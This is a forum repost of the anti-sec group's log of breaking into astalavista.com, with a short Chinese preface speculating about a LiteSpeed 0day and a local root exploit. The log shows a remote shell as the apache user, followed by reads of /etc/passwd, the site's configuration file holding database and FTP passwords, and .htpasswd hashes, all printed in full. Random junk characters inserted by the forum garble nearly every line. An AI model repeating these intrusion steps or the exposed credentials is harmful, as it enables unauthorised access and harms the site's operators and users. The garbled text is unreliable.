中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]

作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。8 |  P8 {7 O  X
* g7 g+ U" Y6 w3 M
[root@front3 ~]# curl -I litespeedtech.com
. C$ a& A3 S. s6 ^! c1 J* e; AHTTP/1.1 200 OK; [7 v5 R' O9 }1 d$ b
Date: Fri, 05 Jun 2009 22:54:51 GMT. ~+ ^9 A4 b9 g! \( J4 \
Server: LiteSpeed6 W: u. h2 R6 N3 T4 g0 |" E

0 y% g1 @. @' j5 f+ v' T; x! S另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
1 Z2 I& d$ x( E$ o6 _/ [0 @) G" T1 w, {* F" _4 F
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。+ E* O. E* l% y+ E/ O

( p$ l. X) G9 r7 m+ |, \
' ^2 L: g$ R' g* y3 p( ]! i8 U! z7 D/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
! O" A6 @1 G0 S6 d/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
# Q8 \8 ]: p! g9 H/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
$ N* \' j5 ]! P6 J' y0 a. r" o( ^\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /! b' F; Y$ }# J6 I
        \/        \/                 \/        \/       \/                     \/                 \/  i9 p+ P& E+ t$ M# v  `
                                  The Hacking & Security Community
) d; q; C8 A& m: G5 e[+] Founded in 1997 by a hacker computer enthusiast
9 @, f. P" A- N8 H" Z[-] Exposed in 2009 by anti-sec group
4 B7 T6 T. s) i- M1 e" W3 f. i/ H" Z( @! q( e2 O6 h
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
! X8 ^- {) o7 ]9 ~6 W& b>> 03. Who’s behind the site?
# B1 n& {/ C8 V' E! _# x! t>>
: T1 J3 ~' K3 i& E! M9 D>> A team of security and IT professionals, and a countless number of contributors from all over the world.
2 y, g" Z1 w8 i3 a
6 |! f1 D8 M. y2 I; u>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
& j& A+ h1 y) ~3 Z>>
$ U$ R# L. {6 @" J. X>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and5 A; e  I4 W% ]0 x$ L* r  n9 S
military institutions.
; x# a! y! B9 s' @; Y$ W>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
) |; F: Y+ \( w) d( f
6 M4 {9 ]. `* cWhy has Astalavista been targeted?
' }( p! n3 |% K+ C
3 u" \/ r3 d6 l: Y" kOther than the fact that they are not doing any of this for the “community” but1 @5 f$ c+ R6 q; r
for the money, they spread exploits for kids, claim to be a security community
% K# f* k  Y5 J/ l7 l( |& r(with no real sense of security on their own servers), and they charge you $6.66
8 P1 V& \( c& V4 d# b8 U  \: vper months to access a dead forum with a directory filled with public releases
2 x: u! m; Z9 Z. J, gand outdated / broken services.! e! j( t# |* [: r) X

! W6 i: X; D5 p6 z' A: z* ?We wanted to see how good that “team of security and IT professionals” really is.
& Q& k2 _  ?8 P" E& E$ V6 l
" `% |4 p) l. R% GLet’s begin.$ [# s$ m" z' r* ?' f, s
1 |+ ^! ~% ?' _
anti-sec:~# ./g0tshell astalavista.com -p 80
; b1 e2 M* C, Z0 j( M[+] Connecting to astalavista.com:80; ?" i8 @: a% S4 v9 ^! |
[+] Grabbing banner…" z8 S% Q5 I0 `) E. E
LiteSpeed* i) y1 E+ d2 g1 J( E
[+] Injecting shellcode…. F/ _$ U. M+ D5 `  V
[-] Wait for it
5 O4 I7 O* D2 o: D9 U# ], j2 ~! B% n$ N! O# D5 I& G0 X( V0 D) c
[~] We g0tshell/ X$ m0 l9 c6 g4 M. A; h
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% X2 n9 K" E# d0 iID: uid=100(apache) gid=500(apache) groups=500(apache)9 W/ B4 C; s! p
" o, R# {3 J! W" j5 J
sh-3.2$ cat /etc/passwd
5 B. {, K4 ^1 d2 q0 s! Droot:x:0:0:root:/root:/bin/bash
! t6 O' f+ ^  Y# u" F, W4 \+ [bin:x:1:1:bin:/bin:/sbin/nologin; c# f* O3 g1 @5 |$ v9 B( Q$ {
daemon:x:2:2:daemon:/sbin:/sbin/nologin
& N; Y; \+ h/ [5 _1 badm:x:3:4:adm:/var/adm:/sbin/nologin
! C* q9 ?, c, ]! V7 Zlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin# J) h1 g5 r' [1 l- L4 u
sync:x:5:0:sync:/sbin:/bin/sync
; R) D; U7 ]) X2 V6 S- Jshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown% ^, V5 u( N+ A) R# ?
halt:x:7:0:halt:/sbin:/sbin/halt1 V2 ~. h$ E7 |8 Q
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
) q5 w2 V- [& v* n) Vnews:x:9:13:news:/etc/news:
, g) V. }0 M& ~6 luucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin. e/ B! v7 |: Y5 a- }! L) J
operator:x:11:0perator:/root:/sbin/nologin
7 ?2 s' a9 L2 Q) M( D# I8 hgames:x:12:100:games:/usr/games:/sbin/nologin
/ Q& C4 \( e2 fgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
* u& p# q6 K! X6 Z5 T$ \8 jftp:x:14:50:FTP User:/var/ftp:/sbin/nologin! b2 O) q4 ?- G4 k4 {- l
nobody:x:99:99:Nobody:/:/sbin/nologin
7 q. `+ a: J# G. L" arpm:x:37:37::/var/lib/rpm:/sbin/nologin1 ]) P- t9 S) I+ o0 }) c  J
dbus:x:81:81:System message bus:/:/sbin/nologin% E9 l" E: N- P; C4 U0 I( F7 C
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin# O! n" P- d5 @, p, U& |
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin: }% R; x  c- q/ Y) L
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin2 g( x: O* W4 g8 Y. ^0 [  O8 ~
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
, l" ?" M9 j! V& q2 A+ Uhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
, ^" E, n& G, f+ D5 C! i$ jrpc:x:32:32ortmapper RPC user:/:/sbin/nologin* ?) }& L% x3 I9 M
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin9 M% y' D& J* E
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin/ R& u, E! y4 F& d' m  I0 q1 H, u) C3 R
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin' {# A1 B9 y9 |. C5 w' m8 n9 h6 M/ G
pcap:x:77:77::/var/arpwatch:/sbin/nologin
* J7 U: v% d9 d' y0 N' I5 a# Snamed:x:25:25:Named:/var/named:/sbin/nologin. `( k4 }$ V8 V0 N5 l! d$ @5 Z
apache:x:100:500::/var/www:/bin/false9 y8 y; E! n% E! s  w
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
4 p- p6 ~; Q; K/ X' P; M  wmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
9 F! I3 q7 v* k3 o: @1 ?& u4 ]) p4 twebapps:x:500:501::/var/www/html:/bin/bash4 R2 _* }0 O9 I( {
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
% l. K4 B# Q+ M% [4 o1 @3 I8 m) hadmin:x:501:502::/home/admin:/bin/bash
9 B. G: S! n: k4 A& Yjon:x:502:503::/home/jon:/bin/bash" k! b8 q3 W8 J
com:x:503:504::/home/com:/bin/bash1 k) _* H9 D6 p1 V* J* J
ntp:x:38:38::/etc/ntp:/sbin/nologin* ~3 B- W9 g+ `
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin6 X" ~, f8 M1 q6 d
astanet:x:504:505::/home/astanet:/bin/bash
- `9 ]# a) }5 `2 ^5 `* x+ Iavahi:x:70:70:Avahi daemon:/:/sbin/nologin, W9 |4 M' J+ b: ?
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+ {+ I* X6 v1 v' q' u6 O
" x$ l3 x' z1 O2 Bsh-3.2$ cat /etc/hosts( W+ J8 k. T5 N* x# V
# Do not remove the following line, or various programs2 t0 g( R  E3 ^2 i  J
# that require network functionality will fail.# f+ y; H7 z1 o4 o+ A
127.0.0.1       localhost.localdomain   localhost  a0 w) t  }9 j+ G
::1     localhost6.localdomain6 localhost6
& Z- f: t- V" E* H" r80.74.154.172           asta1.astalavistaserver.com  V& P) J1 D7 K

" z; w2 C( e/ Q  M5 k# R* Hsh-3.2$ pwd2 Q8 a8 u4 X. b* a* n& C
/home/com/public_html0 f  B2 S/ L# D, \, W: j: t# `

4 [  j  Y4 c" j, f, |sh-3.2$ ls -la7 c4 h1 U# K1 u0 E  g) P
total 18460
0 E$ T$ @; W+ @0 Hdrwxr-xr-x 30 com apache     4096 May 28 17:06 .4 A7 y# C3 M. q' I% S
drwx–x–x 11 com com        4096 Jun 25  2008 ..2 K% @' S- T1 Q6 k' F8 e
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
4 ?6 H! K& Z% L' ?0 R: {/ Cdrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
: ]4 _! Y. `5 F; ]drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin/ K- F1 x9 n9 v5 G) N* ]
drwxrwxrwx  2 com com        4096 May 19 00:50 config0 b& P: w0 k, l1 z" ^& H  S4 u
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
3 t( I8 G/ Z' }. L' d! E' i; ?drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
+ e1 w7 `2 B/ |6 H* H. idrwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing3 R2 U* N; n9 q" u& ]
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
  x, b9 _+ a: e1 ~5 ^' v% ]drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__& q2 G  F1 A3 j7 Z
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
7 c2 K) }# J# Y# T( ?' ?drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
/ Q' w. S7 \# }drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
5 ]5 R4 R; W4 U$ P  \" W* o5 P-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico9 U8 G* q* k3 |& c0 B( }* t
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed4 [" Z7 ]& W7 O: P, G
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess# y( l% T, @$ y" _
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak6 l  D$ O" }; f3 u$ S$ t3 q' z
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
" ?4 N! W! ~' z9 Qdrwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
1 P1 ~+ S3 j! ?0 [# H2 \! idrwxrwxrwx 14 com com        4096 Feb  2 19:29 images
  t5 Y5 ~3 j2 L9 Q. C( S-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php" u6 y. H( [% C, G
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
0 b. {& q9 U7 \' L- U# Ldrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang5 D: j/ z+ t9 q) p* N6 A
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib: z8 a+ E' L9 n7 b1 \6 j. P' F! z! Y
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
) S0 t! k" C* Q/ h3 I: }drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
/ c2 C* y1 |; v( m- \drwxr-xr-x 34 com com        4096 May 28 16:30 modules
. J% z- o% F# M4 l# j, Cdrwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin9 F# J( B: g' K2 L  \) Y
drwxrwxr-x 22 com com        4096 May 28 17:06 _new
8 T6 o# n0 N6 C+ y) P: Zdrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
! z  \* l, N, j( ddrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy2 S* b9 i, J' f7 G
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
5 Y& ]* @+ k7 }8 {-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt2 M, `, |' f- D
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml6 Q% X# T0 e" Z' E" P' P
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php
5 u) n( n. ?# g: b& L4 m9 U4 B# V- z6 H4 Pdrwxrwxrwx  8 com com        4096 Mar  6 13:15 themes% N2 G$ |5 S- o3 K2 ]! _& x
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
. I9 ~# J3 r& U5 X/ Sdrwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam) X, s6 T$ E& p# O

: L6 O4 Q2 U6 Z  |' J5 jsh-3.2$ head -20 index.php
1 L6 [2 ]/ J$ f5 I2 x<?php
& t! ]7 E: F: Z* d$ R- v4 x
6 t; u7 j# r0 J3 U! f- X/**& a! f6 t1 h+ {) O- @
* The main page for the CMS& o/ q1 U' }7 T  N* ~
* @copyright   CONTREXX CMS - COMVATION AG
( a9 w9 {6 D5 L* @author      Comvation Development Team
; M1 f% \+ P4 P8 h' [7 Q0 \* @version     v1.0.9.10.1 stable
9 u/ ?6 Z* n- F! a. i  V' A* @package        contrexx" |7 D8 N+ \5 }) R; a3 n4 z; Q
* @subpackage    core/ M: a$ C8 B$ ]5 P% ]8 D5 _; S
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage3 B1 Y) Y& q' ~+ f7 M# a0 \( a& v
* @since       v0.0.0.0+ A* f8 R- V- U5 u. c' q9 `
* @todo        Capitalize all class names in project
6 k. L& |8 ]5 _  F0 _( u( v& e* @uses        /config/configuration.php
$ z$ A* }; [/ o- Y3 s0 o* @uses        /config/settings.php
: ~) L1 h5 r, p. y3 w* @uses        /config/version.php% ?$ r% P) K% {: M/ B& ?
* @uses        /core/API.php. t) K7 \$ \( x( Z
* @uses        /core_modules/cache/index.class.php
+ q9 }; g: [- ~$ [; X% L, a* @uses        /core/error.class.php
' d$ p3 [+ _8 x: G: p* @uses        /core_modules/banner/index.class.php) \8 B* ~. M# d. c# |
* @uses        /core_modules/contact/index.class.php
/ U1 m. w) Y; T4 v' D
2 H2 ~* l6 P/ G% j7 e+ zsh-3.2$ cd config/+ K1 \4 h  Q3 R  J( Q  w9 \
sh-3.2$ ls -la
' c6 i! k3 u7 d7 \6 m/ ^total 32
9 F% Y" p* S; K4 V$ C& Fdrwxrwxrwx  2 com com    4096 May 19 00:50 ." K+ Z$ K& R0 C, d8 N5 q
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
( w1 A& z/ j% }% l  b8 @1 I9 y-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
$ f! J; S, H4 D0 S7 G-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
, c1 D" _8 m7 h! }6 B( H' q-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php0 ~) L( u6 a3 c* T' J% O
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
) P6 |) b+ Y3 Q( ]' D. t. }! A6 a0 d# V* c6 d+ t2 n
sh-3.2$ cat configuration.php& b  C2 j$ W6 w" ?" W
[snip]
4 u+ \3 @! z# x& o/ _: N; s# [$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
6 M) K0 o, u% U$ o" V& S  n$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name2 L4 Z& _/ t  ~. f2 M$ R2 W
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
5 Q0 K4 R) O0 B, D9 h9 G/ O$ c$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
1 q; e6 z( w0 T/ D3 T1 K$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password/ B: }/ L/ Y0 }9 B* C7 W
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)5 Q( g/ Z+ V* Q' f/ p4 |+ y
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
) @% g- A" s5 f5 m[snip]
. P5 ^0 m/ @, q( V3 O$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
; t9 ]; w3 N: M4 W9 v% \" Y! R  C$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode3 t" `% ~( }* B, M, S5 t4 ~* q2 \
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
1 ?  E& j) }  q& I/ M! n$_FTPCONFIG['port'] = 21; // Ftp remote port
" Z- f  q% Y7 _2 Z$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username4 ^8 B% B5 `( g; w8 Z
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
( w6 A7 x% Z; u# l- {' v4 _$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
% B& z) ~% v! A! o4 q$ Y" Q! C
& J* p3 G" n1 s6 Jsh-3.2$ cd ..
0 ~, `. [% V: Tsh-3.2$ cd dvd/
9 S/ {7 r: f/ M: Ssh-3.2$ ls -la
1 B9 ~7 Y! ^' w" W4 Dtotal 2913780. x5 G/ c- Q/ T) f+ a7 j
drwxr-xr-x  2 com com          4096 Sep  9  2008 .
  A' x% C$ e6 [& M- O0 Kdrwxr-xr-x 30 com apache       4096 May 28 17:06 ..; |4 C$ X# y/ I8 I3 [) M. M) ^! G) V
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar5 Z+ w* I% q: v% L
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
' K3 v& n+ g5 x7 @7 W9 d/ B1 b-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
, D0 P9 F, I% ?, u  J2 A-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
" A& T& K; O6 N+ ?4 I) d1 ~4 }# ~0 a5 {# @; z) n* G
sh-3.2$ cat .htaccess
7 g! q' A  ?" j* `  c' M" @authType Basic
2 N6 a0 O: ~1 s. L; F. nauthName DVD3 I) G7 ^: S# F
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
) ?  T. N2 ~/ f8 x& s! nrequire valid-user  x0 k1 q) B; B, h; f6 o
. u" n( F: |( M, {2 h/ t3 U# j
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
5 z4 y7 A' C- Y: sDVDdownload:CRD8cuY6.MPT66 c' r) i" s, {, F
DVDdownload2:CR8a36.wluFMg
2 p8 |" g; K6 D2 e, H2 ^0 T0 Z; A6 x1 Q
sh-3.2$ cat test.php7 w& D* l8 Y1 G- W
<?php" a0 j' C& {/ j; F
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;: C$ B" d% F( `8 v# B- [
$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
+ e& @2 p" B1 U; I4 a' R6 recho $url;9 H9 a( S3 L) n( _- A5 y
?>
' S, m" z3 I5 G& [3 x% i' Z4 g) f1 X
3 k! X% x  z# Z* C1 W% E! ksh-3.2$ cd modifications/: S+ T/ o& w. q8 P8 ]% d* z  |
sh-3.2$ ls -la7 @  ?9 I$ {5 V& R. R
total 32
! e6 h( w( S* R; p% N6 n: Zdrwxr-xr-x  8 com com    4096 May 11 12:48 .! E2 y  W" ^1 j7 _5 [2 O
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 O' L+ N) o. I* Y8 M. M3 B
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng( M; {$ g* I( Z5 D" {4 X. Y$ ^! L& E
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
& b2 `! B, l" o+ C# @9 I9 ydrwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools  X0 [( s& Y) u
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc/ Q$ ^; _6 f' T) Y1 Z: x
drwxr-xr-x  2 com com    4096 Feb  2 19:33 search# U" P1 z: x7 a- l& V( `! q9 a4 [
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
% R$ x- U, i8 g  l
& }7 }$ J8 T7 P0 C# Rsh-3.2$ ls -R* N. v# }# {5 a# x
.:
# K$ a" G: m3 S6 u- G+ Dcom_avtng  cronjobs  onlinetools  pjirc  search  _tmp
1 _  a0 z" l( N7 t- V+ l! W( _
8 h7 x7 Y* Z4 Y; S./com_avtng:
, d6 H9 q* M7 L& h" {avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts' {( z3 S3 C1 l8 _

  l6 T  ^3 V, q5 n. @./com_avtng/scripts:
. b1 m8 M# b; Y: f  npopunder.js4 ?1 l2 ]: ]- J

. a7 Y  y' I, }+ M% q7 N./cronjobs:4 S4 U; ?9 B% `
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp% N" J# P0 T8 p% Y" v2 s7 i

: C" P6 j; Q4 b  `& y- w6 j./cronjobs/tmp:
2 X4 m) Y! Z: U+ w0 O, O% h) ?contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
. {  o$ _% m" o% i' g2 s  w& E9 q- v: n
./onlinetools:* I$ }6 |' ^: n! E% z5 `' d' R: D
index.php
: U( \# t- P. j( X+ t& J
" R3 ?. j- O, z5 ]; F./pjirc:
7 g7 z, m* _5 Qa_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
* F1 j9 O# o! \! R' EAppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
. n4 Q# j: G1 {4 \+ T, \background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd* P& L; Y; z! T  b
+ i* {' V# j) R! P0 |
./pjirc/img:
- J# D  F' y$ C; H+ V1 Wange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif; |( U) N; @# r' A3 {( o8 D! E
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
0 ]$ A) a5 y$ `2 K9 U/ w# }. d+ _verre-eau.gif
8 ~( R' b& E% w" _3 @argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
" {* ?" a' s+ averre-vin.gif3 w8 i: ^4 y9 s! R% K1 B- M3 ^) w
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
8 F1 b/ W( q5 }8 v- obiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif$ ?* s. B8 I6 ]( u4 z
6 r& g1 z+ N  N; S% I  H
./pjirc/snd:
) G, J# `. ^  O) Z: j% i8 qbell2.au  ding.au* R3 i* H: j8 u$ E6 [

9 @1 h2 `& {$ u; s./search:% Q- q5 _1 Z  p: w' s
searchEngines.php  search.php  z* h7 }% t/ c) ~, K6 {
5 W* m3 h  L7 r6 i
./_tmp:1 \& Y$ h# v3 @0 f8 M
defaultPorts.php  defaultPorts.txt, v+ m; A& O* q
. p- P0 T# M: Y( n
sh-3.2$ cd cronjobs/  s( d) S6 Y# [* r4 d& D4 P) P9 A
sh-3.2$ cat exploits.php) }0 _9 q: @  I# O& s
[snip]: J5 w6 L  \; z, l( ~- n* {8 i
$categories   = array();: A1 z5 n5 G# }& [" V7 o) Y! p
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
7 T; j$ p9 k7 e9 d$expolits     = file($milw0rmFile);
3 |- t" i0 Q9 i( d+ ~1 F  s2 F# B$comExploits  = array();
  t4 i) E' J* d, G  q2 O4 \& _[snip]3 B$ o/ ^4 ?2 H  K
// manage data+ k5 a4 x# k4 e
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640) e; o( T$ J3 s( z. H

8 z' i$ O$ F% B2 y' t9 l% e    // get path and title9 f( ~, b! h/ \2 R# y. ^8 z4 j
    $expolits[$x] = trim($expolits[$x]);; i1 K  l1 ~' k" {
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));8 B# a/ f0 X  t" \# F
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);: ~& W& v) b; s! M8 n8 T1 y
2 u5 i4 j7 m' l$ `( H
    // check if file exists4 t/ C' o/ j& G3 D/ d! }. C
    if (file_exists($path)) {+ y6 `4 B- m7 s7 y
2 X2 S% q# E) u" x& y0 u5 c0 z
        $text = file_get_contents($path);) c; h5 L8 G9 p& N8 Z8 ^! |
5 o# p5 J/ S' W, d2 S7 x, z
        // get content and date# l( {% z5 @6 X8 O& W$ T
        //$text = htmlspecialchars($text, ENT_QUOTES);8 H7 l' @7 Z& U9 }4 U& `) y: m7 t
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
( o* b" k7 p: U$ V- p9 k8 S' }$ W        if ($tmptext != ”) {) Z- o; O7 s. I, y% k" z
            $text = $tmptext;' t- c" x# L% h. U* c  c/ e3 e
        } else {
1 t( n9 Z1 M9 T$ w            $text = addslashes(htmlentities($text,  ENT_QUOTES));1 }: _1 y! s) F, _* W2 g
        }
8 P& e8 H: {6 F        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));  P1 I3 L, X. b' {. B. E4 Y/ i
        $tmp  = explode('-', $date);
* f/ w6 ^) m4 T( V; i" r) J        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
3 ]$ M) y% m$ m6 X        $cat  = getCategory ($path);+ N4 Z* T% A9 A
        $ext  = pathinfo(basename($path));& S0 A( ]! F' b3 r' b
        $ext  = $ext['extension'];
2 l4 p4 S6 [7 j: G# u5 @        $qStr = ”; d& c' d6 ^8 i; j4 V
            SELECT  `id`
$ e9 k, O+ ?: x. t/ p            FROM    `contrexx_module_exploits`
' g4 N/ i0 s3 D7 P            WHERE   `title`  =  ‘” . $title . “‘
  N2 T5 p# J& w+ p# w" z            AND     `date`   =  ‘” . $date . “‘
/ _. e+ X" s+ `2 e3 R1 ]# ?& H/ `6 z        “;
$ u& e% ^2 }- e) A' h, L5 ?5 g        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;* R/ t5 f5 M' C$ ?" z( ]4 k
        $q = $_objDB->query($qStr);, O- E: @$ d( u8 h% D
: t( I0 V4 k- t1 L3 q- d9 u; i
        if ($q->numRows() == 0) {0 R. ^' o. Q' E4 I& S) |
4 ?# s* V  Q8 |# t3 l
            // prepare array
0 Q4 j0 Q2 v1 I- {$ F- D            $comExploits[$x]['date']      = $date;
, N$ z5 g0 Z* y1 z) q4 E) [" s! P            $comExploits[$x]['title']     = $title;9 l* n. ~7 N' r8 }
            $comExploits[$x]['author']    = ‘milw0rm’;
) o9 e4 R; a' r$ C            $comExploits[$x]['text']      = $text;8 Q( `5 C7 T0 n( ?+ K/ X1 ^( T0 V) Y
            $comExploits[$x]['source']    = $ext;( |# L( [) a/ O% I- \  E
            $comExploits[$x]['url1']      = ”;2 b" R+ P/ g. k# Q0 @: h% _
            $comExploits[$x]['url2']      = ”;
, O* m8 Y0 p4 {) G6 z            $comExploits[$x]['catid']     = $cat;
  J3 F1 H8 O4 B4 P8 G: c# q( V            $comExploits[$x]['lang']      = ‘2′;
0 B" h/ L. u* h! O$ w            $comExploits[$x]['userid']    = ‘12′;+ G5 Q  o8 S6 ^; `$ I" Z" O
